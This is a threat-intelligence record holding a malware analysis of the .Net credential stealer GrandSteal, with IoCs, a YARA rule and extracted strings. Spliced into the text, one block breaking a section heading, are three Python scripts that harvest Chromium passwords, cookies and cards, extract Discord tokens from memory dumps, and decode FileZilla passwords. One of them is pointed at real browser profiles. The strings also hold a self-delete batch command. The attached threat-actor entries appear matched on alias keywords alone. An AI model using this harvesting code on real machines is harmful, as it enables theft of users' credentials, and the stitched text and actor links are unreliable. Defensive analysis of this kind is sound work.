{
	"id": "9f4b935c-7c5c-4637-a215-7b69bdcd5bed",
	"created_at": "2026-04-06T00:17:37.484061Z",
	"updated_at": "2026-04-10T03:37:09.374451Z",
	"deleted_at": null,
	"sha1_hash": "273e5115e607c7e11811058ba8ea8e148fadb6cf",
	"title": "Analysis of .Net Stealer GrandSteal (2019-03-18)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 833701,
	"plain_text": "Analysis of .Net Stealer GrandSteal (2019-03-18)\r\nArchived: 2026-04-05 19:47:13 UTC\r\nIn this post I share my notes about the analysis of a sample (a stealer written in .Net) whose family is unknown to me (any feedback is welcome; if you know the family of the sample that I describe, please tell me and I will update this post). Somebody tagged the sample as Quasar at Any.Run; however, after analyzing it and comparing it with the Quasar code, I concluded that this sample does not seem to belong to the Quasar family. Searching for information about the collected IoCs did not help to classify the sample either. I am calling it GrandSteal because of the internal names of the .Net classes in the malware's decompiled code.\r\nOriginal Packed Sample (MD5): 89782B6CDAAAB7848D544255D5FE7002\r\nSource Url: http://a4.doshimotai[.]ru/pxpx.exe\r\nInfo Url: VxVault URLhaus\r\nAutomatically Generated Report: PepperMalware Report\r\nVirustotal First Submission: 2019-03-18 22:28:20\r\nAny.Run Analysis: Here\r\nAny.Run Tags: Evasion, Trojan, Rat, Quasar\r\nMy Classification: I named it GrandSteal because of the internal .Net class names (if you have any information about any well-known family that this malware belongs to, please tell me and I will update this post)\r\nDecompiled Source Code: PepperMalware Github\r\n1. Loader\r\n2. Unpacked Modules\r\n2.1. List of Unpacked Modules\r\n2.2. Stealer\r\n2.2.1. Chromium Stealer\r\n2.2.1.1. Cookies\r\n2.2.1.2. Credentials\r\n2.2.1.3. Autofills\r\n2.2.1.4. Credit Cards\r\n2.2.2. Wallets Stealer\r\n2.2.3. Files From Personal Directories Stealer\r\n2.2.4. Discord Software Stealer\r\n2.2.5. FileZilla Stealer\r\n2.2.6. Gecko Stealer\r\n2.2.7. RDP Stealer\r\n2.2.8. Telegram Stealer\r\n3. Yara Rule\r\n4. Strings of the Main Unpacked Module\r\nhttp://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\r\nPage 1 of 17\n\n1. 
Loader\r\nThe sample is not signed (it carries no Authenticode signature), but its version info claims to be a Symantec product:\r\nProduct: Symantec© 2019\r\nDescription: pxpx.exe\r\nOriginal Name: pxpx.exe\r\nInternal Name: pxpx.exe\r\nFile Version: 7.1.0.0\r\nComments: Symantec Application\r\nThe loader module is a .Net executable obfuscated with ConfuserEx v1.0.0 (the ConfusedByAttribute that shows up in the strings of the unpacked module is the marker attribute ConfuserEx leaves behind).\r\n2. Unpacked Modules\r\n2.1. List of Unpacked Modules\r\nOnce we have executed the sample in the VM, we can check with WinDbg that the malware unpacks a set of modules in memory:\r\nAfter dumping these executables to disk, we check that most of them are .Net executables, which we can decompile with dnSpy:\r\nGrandSteal.* are the main modules of the malware. I uploaded the decompiled code for these modules to my GitHub. Additionally, the malware carries some libraries that it needs.\r\n2.2. Stealer\r\nThe malware contains code to steal credentials from different products:\r\n2.2.1. Chromium Stealer\r\nThe malware is able to steal different information from Chromium browsers:\r\nThe malware steals all of the Chromium information from the browser's SQLite databases (Chromium keeps the logins in the Login Data file, the cookies in the Cookies file, and the autofill entries and credit cards in the Web Data file; all three are SQLite databases inside the profile directory).\r\n2.2.1.1. Cookies\r\nIt reads the cookies table from the SQLite database.\r\n2.2.1.2. Credentials\r\nIt reads the logins table from the SQLite database.\r\n2.2.1.3. Autofills\r\nIt reads the autofill table from the SQLite database.\r\n2.2.1.4. Credit Cards\r\nIt reads the credit_cards table from the SQLite database.\r\n2.2.2. 
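The following Python script is an added example, not code from this post or from the GrandSteal sample, that reproduces the collection described in 2.2.1 against a constructed Chromium profile. It writes three small SQLite files with the real table and column names (Login Data with logins, Cookies with cookies, Web Data with autofill and credit_cards), copies each file to a temporary path before opening it, because a running browser keeps these files open and locked (the module's CreateTempCopy and CreateTempPath strings suggest the same approach; that reading is an assumption), and returns the rows of the four tables. The password_value, encrypted_value and card_number_encrypted columns are DPAPI-protected on Windows; the script returns them as opaque bytes and does not try to decrypt them. The profile layout, the row contents and every helper name are constructed for the example.

```python
import os
import shutil
import sqlite3
import tempfile

# Chromium profile files covered by 2.2.1, with the tables and columns a
# stealer reads. The schemas are cut-down versions of the real ones
# (constructed for this example); the file, table and column names are real.
CHROMIUM_TABLES = {
    'Login Data': {
        'logins': 'origin_url TEXT, username_value TEXT, password_value BLOB',
    },
    'Cookies': {
        'cookies': 'host_key TEXT, name TEXT, encrypted_value BLOB',
    },
    'Web Data': {
        'autofill': 'name TEXT, value TEXT',
        'credit_cards': 'name_on_card TEXT, expiration_month INTEGER, '
                        'expiration_year INTEGER, card_number_encrypted BLOB',
    },
}

# One query per table. password_value, encrypted_value and
# card_number_encrypted are DPAPI-protected on Windows and come back as bytes.
QUERIES = {
    'logins': 'SELECT origin_url, username_value, password_value FROM logins',
    'cookies': 'SELECT host_key, name, encrypted_value FROM cookies',
    'autofill': 'SELECT name, value FROM autofill',
    'credit_cards': 'SELECT name_on_card, expiration_month, expiration_year, '
                    'card_number_encrypted FROM credit_cards',
}

# Constructed sample rows, one per table. The blobs stand in for DPAPI output.
SAMPLE_ROWS = {
    'logins': ('https://example.test/login', 'alice', b'v10-opaque-dpapi-blob'),
    'cookies': ('.example.test', 'session', b'v10-opaque-dpapi-blob'),
    'autofill': ('email', 'alice@example.test'),
    'credit_cards': ('Alice Example', 12, 2027, b'v10-opaque-dpapi-blob'),
}


def make_sample_profile(profile_dir):
    """Write the three SQLite files of a fake profile into profile_dir."""
    os.makedirs(profile_dir, exist_ok=True)
    for db_name, tables in CHROMIUM_TABLES.items():
        con = sqlite3.connect(os.path.join(profile_dir, db_name))
        for table, columns in tables.items():
            row = SAMPLE_ROWS[table]
            placeholders = ','.join('?' * len(row))
            con.execute(f'CREATE TABLE {table} ({columns})')
            con.execute(f'INSERT INTO {table} VALUES ({placeholders})', row)
        con.commit()
        con.close()
    return profile_dir


def build_demo_profile():
    """Create the sample profile under a fresh temporary directory."""
    return make_sample_profile(os.path.join(tempfile.mkdtemp(), 'Default'))


def read_table_from_copy(db_path, query):
    """Copy the database before opening it: a running browser holds its
    SQLite files open and locked, so stealers and forensic tools alike
    work on a copy rather than on the live file."""
    tmp_dir = tempfile.mkdtemp()
    tmp_copy = os.path.join(tmp_dir, os.path.basename(db_path))
    shutil.copy2(db_path, tmp_copy)
    try:
        con = sqlite3.connect(tmp_copy)
        try:
            return con.execute(query).fetchall()
        finally:
            con.close()
    finally:
        shutil.rmtree(tmp_dir, ignore_errors=True)


def collect_chromium(profile_dir):
    """Return {table_name: rows} for the cookies, logins, autofill and
    credit_cards tables of one Chromium profile directory."""
    results = {}
    for db_name, tables in CHROMIUM_TABLES.items():
        db_path = os.path.join(profile_dir, db_name)
        if not os.path.isfile(db_path):
            continue  # profile without that file (e.g. no saved cards yet)
        for table in tables:
            results[table] = read_table_from_copy(db_path, QUERIES[table])
    return results


if __name__ == '__main__':
    for table, rows in collect_chromium(build_demo_profile()).items():
        print(table, rows)
```

Point collect_chromium at a real profile directory (for example %LOCALAPPDATA%\Google\Chrome\User Data\Default on Windows) to see the same four result sets; the encrypted columns stay opaque unless they are passed through DPAPI in the context of the user that owns the profile.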
Wallets Stealer\r\nThe malware is able to steal wallets from the following crypto-coin products (for the Qt clients it first reads the data directory from the registry and then looks for wallet.dat inside it):\r\nLitecoin: \"%appdata%\\Litecoin\\wallet.dat\"\r\nLitecoin-Qt: walletpath=read(\"HKCU\\Software\\Litecoin\\strDataDir\"), walletpath + \"wallet.dat\"\r\nLitecoin-Qt: walletpath=read(\"HKCU\\Software\\Litecoin-Qt\\strDataDir\"), walletpath + \"wallet.dat\"\r\nBitcoin: \"%appdata%\\Bitcoin\\wallet.dat\"\r\nBitcoin-Qt: walletpath=read(\"HKCU\\Software\\Bitcoin\\strDataDir\"), walletpath + \"wallet.dat\"\r\nBitcoin-Qt: walletpath=read(\"HKCU\\Software\\Bitcoin-Qt\\strDataDir\"), walletpath + \"wallet.dat\"\r\nBytecoin: \"%appdata%\\bytecoin\\*.wallet\"\r\nExodus: \"%appdata%\\Exodus\\*\"\r\nDash-Qt: walletpath=read(\"HKCU\\Software\\Dash\\strDataDir\"), walletpath + \"wallet.dat\"\r\nDash-Qt: walletpath=read(\"HKCU\\Software\\Dash-Qt\\strDataDir\"), walletpath + \"wallet.dat\"\r\nElectrum: \"%appdata%\\Electrum\\wallets\\*\"\r\nEthereum: \"%appdata%\\Ethereum\\wallets\\*\"\r\nMonero: walletpath=read(\"HKCU\\Software\\monero-project\\wallet_path\"), walletpath + \"wallet.dat\"\r\nMonero: walletpath=read(\"HKCU\\Software\\monero-core\\wallet_path\"), walletpath + \"wallet.dat\"\r\n2.2.3. Files From Personal Directories Stealer\r\nThe malware can steal files from the Desktop, Favorites and Personal folders (the DesktopFileExtensions strings of the module suggest that the files are selected by extension):\r\n2.2.4. Discord Software Stealer\r\nFrom Wikipedia: \"Discord is a proprietary freeware VoIP application and digital distribution platform designed for video gaming communities, that specializes in text, image, video and audio communication between users in a chat channel\".\r\nThe malware is able to steal information from this VoIP application by using a curious method. 
It calls the DbgHelp.dll API MiniDumpWriteDump to create a minidump of any process whose name contains the word \"Discord\".\r\nOnce the minidump file is created, it searches the minidump for Discord JSON sessions by using a regex (the pattern is among the strings of the module: ({\"token\":\"(.*)}}]})):\r\n2.2.5. FileZilla Stealer\r\nThe malware reads credentials from the FileZilla XML files, recentservers.xml and sitemanager.xml (the module's format strings are {0}\\FileZilla\\recentservers.xml and {0}\\FileZilla\\sitemanager.xml; FileZilla keeps both files under %APPDATA%):\r\n2.2.6. Gecko Stealer\r\nFrom Wikipedia: \"Gecko is a browser engine developed by Mozilla. It is used in the Firefox browser, the Thunderbird email client, and many other projects\".\r\nThe malware locates some important Gecko profile files (the strings cookies.sqlite, password-check, Key4MagicNumber, ExtractPrivateKey3/ExtractPrivateKey4, globalSalt and entrySalt correspond to the cookie database and to the key3.db/key4.db master-key material that protects the stored logins):\r\nIt is able to recover credentials:\r\nAnd cookies:\r\nThe source code related to this functionality is GeckoManager.cs.\r\n2.2.7. RDP Stealer\r\nThe malware can steal RDP credentials (the CredentialManagement and set_RdpConnections strings suggest that it enumerates saved connections and their stored Windows credentials):\r\nThe source code related to this functionality is RdpManager.cs.\r\n2.2.8. Telegram Stealer\r\nThe malware reads the files located at:\r\n\"%appdata%\\Telegram Desktop\\tdata\\D877F783D5D3EF8C\\map*\"\r\nFrom those files, it tries to recover Telegram sessions:\r\n3. 
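The following Python snippet is an added example, not code from this post or from the sample, covering the second half of the Discord routine described in 2.2.4: applying the post's regex to dump contents. Creating the minidump itself needs the Windows-only MiniDumpWriteDump call and is left out; the dump here is a constructed byte string with binary noise around two fake sessions. The second pattern, TOKEN_RE, is an addition that is not in the sample: it shows why the sample's greedy (.*) is fragile, since two sessions on one line with no newline between them collapse into a single match. The 'Discord' substring check mirrors the process selection the post describes; the sample's exact comparison (case sensitivity, full name versus substring) is not shown here, so case-sensitive substring matching is an assumption.

```python
import re

# The regex the post shows, run over the raw bytes of the minidump.
SESSION_RE = re.compile(rb'({"token":"(.*)}}]})')
# Tighter pattern added for comparison (not from the sample): stop at the
# closing quote of the token instead of running to the last }}]} on the line.
TOKEN_RE = re.compile(rb'"token":"([^"]+)"')


def is_discord_process(name):
    """Process selection as the post describes it: the name contains
    'Discord'. Case-sensitive substring matching is an assumption here."""
    return 'Discord' in name


def find_discord_json_sessions(dump):
    """Return every blob the sample's regex would extract from dump bytes."""
    return [m.group(1) for m in SESSION_RE.finditer(dump)]


def extract_tokens(dump):
    """Return the token values themselves, one per session, using TOKEN_RE."""
    return [m.group(1).decode('ascii', 'replace') for m in TOKEN_RE.finditer(dump)]


def build_sample_dump(separator=None):
    """Constructed stand-in for a minidump: binary noise around two fake
    sessions. With the default separator the sessions sit on different
    'lines' of the dump (the noise contains a 0x0A byte); pass b' ' to put
    them on one line."""
    noise = bytes(range(0, 32)) + b'MDMP' + bytes(range(128, 160))
    if separator is None:
        separator = noise
    first = b'{"token":"MTAx.fake.token1"}}]}'
    second = b'{"token":"MTAy.fake.token2"}}]}'
    return noise + first + separator + second + noise


if __name__ == '__main__':
    print(find_discord_json_sessions(build_sample_dump()))
    print(find_discord_json_sessions(build_sample_dump(b' ')))  # one greedy match
    print(extract_tokens(build_sample_dump(b' ')))               # still two tokens
```

On the defensive side, writing a minidump of another process requires opening it with at least PROCESS_QUERY_INFORMATION and PROCESS_VM_READ, which Sysmon Event ID 10 (ProcessAccess) records; a .Net process opening a Discord process with those rights is a usable detection hook for this stealer.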
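An added example, not the sample's code, of reading the two FileZilla files named in 2.2.5. FileZilla 3 stores each site as a Server element with Host, Port, User and Pass children; the password is base64-encoded when the Pass element carries encoding='base64' (older versions wrote it in clear), and sites may be nested inside Folder elements. The XML below is constructed for the example with fake hosts and credentials; the parser walks every Server element regardless of nesting, which is what lets one function read both sitemanager.xml and recentservers.xml. The filezilla_config_paths helper is an assumption about how the module fills the {0} placeholder of its two format strings.

```python
import base64
import os
import xml.etree.ElementTree as ET

# Constructed sitemanager.xml in the FileZilla 3 layout: one top-level site
# with a base64 password and one site inside a folder written the old way,
# in clear. Hosts and credentials are fake.
SAMPLE_SITEMANAGER = b'''<?xml version='1.0' encoding='UTF-8'?>
<FileZilla3 version='3.40.0' platform='windows'>
  <Servers>
    <Server>
      <Host>ftp.example.test</Host>
      <Port>21</Port>
      <Protocol>0</Protocol>
      <User>alice</User>
      <Pass encoding='base64'>c3VwZXJzZWNyZXQ=</Pass>
      <Name>Example site</Name>
    </Server>
    <Folder expanded='1'>Work
      <Server>
        <Host>sftp.example.test</Host>
        <Port>22</Port>
        <Protocol>1</Protocol>
        <User>bob</User>
        <Pass>oldstyleplain</Pass>
      </Server>
    </Folder>
  </Servers>
</FileZilla3>
'''


def extract_filezilla_credentials(xml_data):
    """Return one dict per Server element, at any nesting depth, with the
    password decoded when it is marked encoding='base64'."""
    root = ET.fromstring(xml_data)
    creds = []
    for server in root.iter('Server'):
        password = None
        pass_el = server.find('Pass')
        if pass_el is not None and pass_el.text:
            if pass_el.get('encoding') == 'base64':
                password = base64.b64decode(pass_el.text).decode('utf-8', 'replace')
            else:
                password = pass_el.text  # pre-base64 FileZilla wrote it in clear
        creds.append({
            'host': server.findtext('Host'),
            'port': int(server.findtext('Port') or 0),
            'user': server.findtext('User'),
            'password': password,
        })
    return creds


def filezilla_config_paths(appdata):
    """Fill the {0} placeholder of the module's two format strings with the
    user's AppData directory (assumed; FileZilla stores both files there)."""
    return [os.path.join(appdata, 'FileZilla', name)
            for name in ('recentservers.xml', 'sitemanager.xml')]


if __name__ == '__main__':
    for cred in extract_filezilla_credentials(SAMPLE_SITEMANAGER):
        print(cred)
```

Because the base64 layer is an encoding and not encryption, any process running as the user can recover these passwords in clear; FileZilla's own mitigation is its optional master password, which changes the Pass element to an encrypted form this parser does not handle.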
Yara Rule\r\nrule grandsteal {\r\n    meta:\r\n        description = \"GrandSteal .Net stealer, strings of the main unpacked module\"\r\n        reference = \"http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html\"\r\n        packed_sample_md5 = \"89782B6CDAAAB7848D544255D5FE7002\"\r\n    strings:\r\n        $s1 = \"ws://{0}:{1}/websocket\" wide\r\n        $s2 = \"GrabBrowserCredentials: \" wide\r\n        $s3 = \"GrabColdWallets: \" wide\r\n        $s4 = \"GrabDesktopFiles: \" wide\r\n        $s5 = \"GrabTelegram: \" wide\r\n        $s6 = \"ColdWallets parser has been started\" wide\r\n        $s7 = \"DiscordSession parser has been started\" wide\r\n        $s8 = \"Rdps parser has been started\" wide\r\n        $s9 = \"DesktopFiles parser has been started\" wide\r\n        $s10 = \"FTPs parser has been started\" wide\r\n        $s11 = \"TelegramSession parser has been started\" wide\r\n        $s12 = \"ListOfProcesses parser has been started\" wide\r\n        $s13 = \"ListOfPrograms parser has been started\" wide\r\n        $s14 = \"card_number_encrypted\" wide\r\n        $s15 = \"\\\\Litecoin\\\\wallet.dat\" wide\r\n        $s16 = \"\\\\Bitcoin\\\\wallet.dat\" wide\r\n        $s17 = \"\\\\Exodus\\\\exodus.wallet\" wide\r\n        $s18 = \"\\\\Electrum\\\\wallets\" wide\r\n        $s19 = \"\\\\Ethereum\\\\wallets\" wide\r\n        $s20 = \"monero-project\" wide\r\n        $s21 = \"Discord dump UNKNOWN\" wide\r\n        $s22 = \"{0}\\\\FileZilla\\\\recentservers.xml\" wide\r\n        $s23 = \"{0}\\\\FileZilla\\\\sitemanager.xml\" wide\r\n        $s24 = \"cookies.sqlite\" wide\r\n        $s25 = \"password-check\" wide\r\n        $s26 = \"AppData\\\\Roaming\\\\Telegram Desktop\\\\tdata\\\\D877F783D5D3EF8C\" wide\r\n        $s27 = \"%USERPROFILE%\\\\AppData\\\\Local\\\\Temp\\\\Remove.bat\" wide\r\n        $s28 = \"taskkill /F /PID %1\" wide\r\n        $s29 = \"choice /C Y /N /D Y /T 3 \u0026 Del %2\" wide\r\n        $s30 = \"ExtractPrivateKey\" wide\r\n        $s31 = \"formSubmitURL\" wide\r\n        $s32 = \"passwordField\" wide\r\n        $s33 = \"usernameField\" wide\r\n        $s34 = \"GrabDiscord\" wide\r\n        $s35 = \"encryptedPassword\" wide\r\n        $s36 = \"masterPassword\" wide\r\n        $s37 = \"WalletName\" wide\r\n    condition:\r\n        30 of them\r\n}\r\n4. 
Strings of the Main Unpacked Module\r\nhttps://domekan[.]ru/ModuleMystery/Updates.txt\r\nSQLite format 3\r\nws://{0}:{1}/websocket\r\nServer is initialized\r\nCredentialsRequest has been created\r\nParseClientSettings\r\nGrabBrowserCredentials: \r\nGrabColdWallets: \r\nGrabDesktopFiles: \r\nGrabTelegram: \r\nInvalid JsonMessage data from server. Exception : \r\nClientInfos parser has been started\r\nClientInfos has been parsed.Elapsed time: {0}\r\nBrowsers parser has been started\r\nBrowsers has been parsed.Elapsed time: {0}\r\nColdWallets parser has been started\r\nColdWallets has been parsed.Elapsed time: {0}\r\nDiscordSession parser has been started\r\nDiscordSession has been parsed.Elapsed time: {0}\r\nRdps parser has been started\r\nRdps has been parsed.Elapsed time: {0}\r\nDesktopFiles parser has been started\r\nDesktopFiles has been parsed.Elapsed time: {0}\r\nFTPs parser has been started\r\nFTPs has been parsed.Elapsed time: {0}\r\nTelegramSession parser has been started\r\nTelegramSession has been parsed.Elapsed time: {0}\r\nListOfProcesses parser has been started\r\nListOfProcesses has been parsed.Elapsed time: {0}\r\nListOfPrograms parser has been started\r\nListOfPrograms has been parsed.Elapsed time: {0}\r\nencrypted_value\r\nexpiration_month\r\nexpiration_year\r\ncard_number_encrypted\r\nusername_value\r\npassword_value\r\nAppData\\Roaming\\\r\nAppData\\Local\\\r\n\\Litecoin\\wallet.dat\r\n\\Bitcoin\\wallet.dat\r\n\\Exodus\\exodus.wallet\r\n\\Electrum\\wallets\r\n\\Ethereum\\wallets\r\nmonero-project\r\nJsonSession UNKNOWN\r\nDiscord dump UNKNOWN\r\nDiscord process UNKNOWN\r\n({\"token\":\"(.*)}}]})\r\n{0}\\FileZilla\\recentservers.xml\r\n{0}\\FileZilla\\sitemanager.xml\r\ncookies.sqlite\r\n[^\\u0020-\\u007F]\r\npassword-check\r\nAppData\\Roaming\\Telegram Desktop\\tdata\r\nAppData\\Roaming\\Telegram Desktop\\tdata\\D877F783D5D3EF8C\r\nD877F783D5D3EF8C*\r\nAppData\\Roaming\r\nAppData\\Local\\Temp\r\nThe binary key cannot have an odd number of digits: {0}\r\n%USERPROFILE%\\AppData\\Local\\Temp\\Remove.bat\r\ntaskkill /F /PID %1\r\nchoice /C Y /N /D Y /T 3 \u0026 Del %2\r\nClientSettings.db\r\n 1.85 (Hash, version 2, native byte-order)\r\nFileDescription\r\nGrandSteal.Client.Data\r\nGrandSteal.Client.Data.dll\r\nExtractPrivateKey3\r\nExtractPrivateKey4\r\nget_formSubmitURL\r\nset_formSubmitURL\r\nGrandSteal.Client.Data\r\nRoamingAppData\r\nget_ObjectData\r\nset_ObjectData\r\nSystem.Collections.Generic\r\nMicrosoft.VisualBasic\r\nget_ManagedThreadId\r\nget_CurrentThread\r\nget_timePasswordChanged\r\nset_timePasswordChanged\r\nget_timeLastUsed\r\nset_timeLastUsed\r\nget_timeCreated\r\nset_timeCreated\r\nHandleWorkCompleted\r\nOnWorkCompleted\r\ncountCompleted\r\nOnResponseRecieved\r\nadd_DataReceived\r\nadd_MessageReceived\r\nSystem.Collections.Specialized\r\nget_passwordField\r\nset_passwordField\r\nget_usernameField\r\nset_usernameField\r\nBrowserCreditCard\r\nget_GrabDiscord\r\nget_encryptedPassword\r\nset_encryptedPassword\r\nget__masterPassword\r\nset_WalletName\r\nget_encryptedUsername\r\nset_encryptedUsername\r\nset_AllowUnstrustedCertificate\r\nDebuggerNonUserCodeAttribute\r\nDebuggableAttribute\r\nComVisibleAttribute\r\nAssemblyTitleAttribute\r\nUserScopedSettingAttribute\r\nAssemblyTrademarkAttribute\r\nExtensionAttribute\r\nAssemblyFileVersionAttribute\r\nAssemblyConfigurationAttribute\r\nAssemblyDescriptionAttribute\r\nCompilationRelaxationsAttribute\r\nAssemblyProductAttribute\r\nAssemblyCopyrightAttribute\r\nConfusedByAttribute\r\nParamArrayAttribute\r\nAssemblyCompanyAttribute\r\nRuntimeCompatibilityAttribute\r\nget_SQLDataTypeSize\r\nclientInfoFlag\r\nset_EnableAutoSendPing\r\nSystem.Threading\r\nget_DataEncoding\r\nFromBase64String\r\nDownloadString\r\nCreateTempPath\r\nget_ObjectLength\r\nset_ObjectLength\r\nset_ExpirationMonth\r\nget_Passwordcheck\r\nTransformFinalBlock\r\nReadBrowserCredendtial\r\nExtractManagerCredential\r\nExtractRecentCredential\r\nop_GreaterThanOrEqual\r\nset_AutoSendPingInterval\r\nRuntimeTypeModel\r\nSystem.ComponentModel\r\nGrandSteal.Client.Data.dll\r\nBrowserAutofill\r\nget_BaseStream\r\nUserStreamParam\r\nExceptionParam\r\nget_GrabTelegram\r\nSymmetricAlgorithm\r\nICryptoTransform\r\nIsNullExtension\r\nDiscordSession\r\ndiscordSession\r\nTelegramSession\r\ntelegramSession\r\nFindDiscordJsonSession\r\nGrandSteal.SharedModels.Communication\r\nset_ClientInformation\r\nRemoteClientInformation\r\nSystem.Configuration\r\nSystem.Globalization\r\nSystem.Reflection\r\nStringCollection\r\nMatchCollection\r\nCryptographicException\r\nArgumentException\r\nGeckoPasswordBasedEncryption\r\nGrandSteal.Client.Models.Extensions.Json\r\nFileSystemInfo\r\nProcessStartInfo\r\nGrandSteal.Client.Data.Gecko\r\nDeSerializeProto\r\nMiniDumpWriteDump\r\nset_ExpirationYear\r\nKey4MagicNumber\r\nset_CardNumber\r\nSHA1CryptoServiceProvider\r\nMD5CryptoServiceProvider\r\nTripleDESCryptoServiceProvider\r\nCrytoServiceProvider\r\nIFormatProvider\r\nFileZillaManager\r\nDiscordManager\r\nDesktopFileManager\r\nTelegramManager\r\nChromiumManager\r\nColdWalletManager\r\nConvertToInteger\r\nObjectIdentifier\r\nResponseHandler\r\nSystem.CodeDom.Compiler\r\nClientInfoHelper\r\nRecoveryHelper\r\nGrandSteal.Client.Data.Server\r\nInitializeServer\r\nCreateDecryptor\r\nSystem.Diagnostics\r\nAddMilliseconds\r\ntimeoutMilliseconds\r\nget_BrowserCreditCards\r\nset_BrowserCreditCards\r\nGetCreditCards\r\nSystem.Runtime.InteropServices\r\nMicrosoft.VisualBasic.CompilerServices\r\nSystem.Runtime.CompilerServices\r\nDebuggingModes\r\nget_ChildNodes\r\nget_BrowserCookies\r\nset_BrowserCookies\r\nget_Directories\r\nGetDirectories\r\nget_MasterEntries\r\nset_MasterEntries\r\nExpandEnvironmentVariables\r\nMicrosoft.Win32.SafeHandles\r\nset_DesktopFiles\r\nget_GrabDesktopFiles\r\nset_BrowserProfiles\r\nbrowserProfiles\r\nset_AutoAddMissingTypes\r\nListOfProcesses\r\nRecieveSettings\r\nClientSettings\r\nDataReceivedEventArgs\r\nMessageReceivedEventArgs\r\nErrorEventArgs\r\nget_BrowserCredendtials\r\nset_BrowserCredendtials\r\nGrandSteal.Client.Models.Credentials\r\nSendCredentials\r\nrdpCredentials\r\nset_FtpCredentials\r\nExtractFtpCredentials\r\nftpCredentials\r\nget_GrabBrowserCredentials\r\nGetCredentials\r\nGrandSteal.SharedModels.Models\r\nGrandSteal.Client.Models\r\nGrandSteal.SharedModels\r\nget_BrowserAutofills\r\nset_BrowserAutofills\r\nGrandSteal.Client.Models.Extensions.Nulls\r\nset_InstalledPrograms\r\nListOfPrograms\r\nGrandSteal.Client.Models.Extensions\r\nget_DesktopFileExtensions\r\nset_DesktopFileExtensions\r\nJsonExtensions\r\nProtoExtensions\r\nget_DesktopExtensions\r\nset_DesktopExtensions\r\nRequestsExtensions\r\nSystem.Text.RegularExpressions\r\nSystem.Collections\r\nset_RdpConnections\r\nStringSplitOptions\r\nget_DesktopFileManagers\r\nget_RdpManagers\r\nget_FtpManagers\r\nget_BrowserCredentialsManagers\r\nget_ColdWalletManagers\r\nGrandSteal.Client.Data.Helpers\r\nRuntimeHelpers\r\nFindDisordProcess\r\nGetCurrentProcess\r\nset_ColdWallets\r\nget_GrabColdWallets\r\nget_disabledHosts\r\nset_disabledHosts\r\nGrabLitecoinQt\r\nCommunicationObject\r\nReadTableFromOffset\r\nget__globalSalt\r\nget__entrySalt\r\nGetValueOrDefault\r\nCredentialManagement\r\nget_DocumentElement\r\nget_SqlStatement\r\nset_SqlStatement\r\nAutoResetEvent\r\nset_Screenshot\r\nCredentialsRequest\r\nset_ProcessList\r\nset_CreateNoWindow\r\nConvertHexStringToByteArray\r\nInitializeArray\r\nFindValueByKey\r\nSystem.Security.Cryptography\r\nGetEntryAssembly\r\nCreateTempCopy\r\nGrandSteal.Client.Data.Recovery\r\nset_WorkingDirectory\r\nprofilesDirectory\r\nGetCurrentDirectory\r\nGeckoRootEntry",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"http://www.peppermalware.com/2019/03/analysis-of-net-stealer-grandsteal-2019.html"
	],
	"report_names": [
		"analysis-of-net-stealer-grandsteal-2019.html"
	],
	"threat_actors": [
		{
			"id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12",
			"created_at": "2023-01-06T13:46:39.396409Z",
			"updated_at": "2026-04-10T02:00:03.312816Z",
			"deleted_at": null,
			"main_name": "Earth Lusca",
			"aliases": [
				"CHROMIUM",
				"ControlX",
				"TAG-22",
				"BRONZE UNIVERSITY",
				"AQUATIC PANDA",
				"RedHotel",
				"Charcoal Typhoon",
				"Red Scylla",
				"Red Dev 10",
				"BountyGlad"
			],
			"source_name": "MISPGALAXY:Earth Lusca",
			"tools": [
				"RouterGod",
				"SprySOCKS",
				"ShadowPad",
				"POISONPLUG",
				"Barlaiy",
				"Spyder",
				"FunnySwitch"
			],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df",
			"created_at": "2023-01-06T13:46:38.402513Z",
			"updated_at": "2026-04-10T02:00:02.959797Z",
			"deleted_at": null,
			"main_name": "Sandworm",
			"aliases": [
				"IRIDIUM",
				"Blue Echidna",
				"VOODOO BEAR",
				"FROZENBARENTS",
				"UAC-0113",
				"Seashell Blizzard",
				"UAC-0082",
				"APT44",
				"Quedagh",
				"TEMP.Noble",
				"IRON VIKING",
				"G0034",
				"ELECTRUM",
				"TeleBots"
			],
			"source_name": "MISPGALAXY:Sandworm",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad",
			"created_at": "2022-10-25T16:07:23.590051Z",
			"updated_at": "2026-04-10T02:00:04.679488Z",
			"deleted_at": null,
			"main_name": "Energetic Bear",
			"aliases": [
				"ATK 6",
				"Blue Kraken",
				"Crouching Yeti",
				"Dragonfly",
				"Electrum",
				"Energetic Bear",
				"G0035",
				"Ghost Blizzard",
				"Group 24",
				"ITG15",
				"Iron Liberty",
				"Koala Team",
				"TG-4192"
			],
			"source_name": "ETDA:Energetic Bear",
			"tools": [
				"Backdoor.Oldrea",
				"CRASHOVERRIDE",
				"Commix",
				"CrackMapExec",
				"CrashOverride",
				"Dirsearch",
				"Dorshel",
				"Fertger",
				"Fuerboos",
				"Goodor",
				"Havex",
				"Havex RAT",
				"Hello EK",
				"Heriplor",
				"Impacket",
				"Industroyer",
				"Karagany",
				"Karagny",
				"LightsOut 2.0",
				"LightsOut EK",
				"Listrix",
				"Oldrea",
				"PEACEPIPE",
				"PHPMailer",
				"PsExec",
				"SMBTrap",
				"Subbrute",
				"Sublist3r",
				"Sysmain",
				"Trojan.Karagany",
				"WSO",
				"Webshell by Orb",
				"Win32/Industroyer",
				"Wpscan",
				"nmap",
				"sqlmap",
				"xFrost"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa",
			"created_at": "2022-10-25T16:47:55.919702Z",
			"updated_at": "2026-04-10T02:00:03.618194Z",
			"deleted_at": null,
			"main_name": "IRON VIKING",
			"aliases": [
				"APT44 ",
				"ATK14 ",
				"BlackEnergy Group",
				"Blue Echidna ",
				"CTG-7263 ",
				"ELECTRUM ",
				"FROZENBARENTS ",
				"Hades/OlympicDestroyer ",
				"IRIDIUM ",
				"Qudedagh ",
				"Sandworm Team ",
				"Seashell Blizzard ",
